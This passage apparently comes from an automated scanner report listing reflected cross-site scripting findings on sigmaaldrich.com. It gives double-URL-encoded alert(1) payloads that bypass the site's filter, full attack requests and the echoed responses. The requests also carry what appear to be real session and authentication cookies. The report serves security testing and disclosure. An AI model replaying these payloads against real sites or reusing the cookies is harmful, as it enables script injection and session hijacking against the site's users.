WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma580ec";alert(1)//62f97b72205/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.325. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f26%2522%253balert%25281%2529%252f%252fecdb5f9605b was submitted in the REST URL parameter 5. This input was echoed as 81f26";alert(1)//ecdb5f9605b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information81f26%2522%253balert%25281%2529%252f%252fecdb5f9605b/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information81f26";alert(1)//ecdb5f9605b/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.326. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff54b%2522%253balert%25281%2529%252f%252fe973efaf915 was submitted in the REST URL parameter 6. This input was echoed as ff54b";alert(1)//e973efaf915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/ff54b%2522%253balert%25281%2529%252f%252fe973efaf915/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/ff54b";alert(1)//e973efaf915/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.327. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8592a%2522%253balert%25281%2529%252f%252f7f2b26672c6 was submitted in the REST URL parameter 1. This input was echoed as 8592a";alert(1)//7f2b26672c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8592a%2522%253balert%25281%2529%252f%252f7f2b26672c6/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:24 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8592a";alert(1)//7f2b26672c6/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.328. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19e7c%2522%253balert%25281%2529%252f%252fd44eb148b23 was submitted in the REST URL parameter 2. This input was echoed as 19e7c";alert(1)//d44eb148b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib19e7c%2522%253balert%25281%2529%252f%252fd44eb148b23/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:28 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib19e7c";alert(1)//d44eb148b23/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.329. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea80%2522%253balert%25281%2529%252f%252ff4e4d5d292a was submitted in the REST URL parameter 3. This input was echoed as bea80";alert(1)//f4e4d5d292a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsbea80%2522%253balert%25281%2529%252f%252ff4e4d5d292a/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 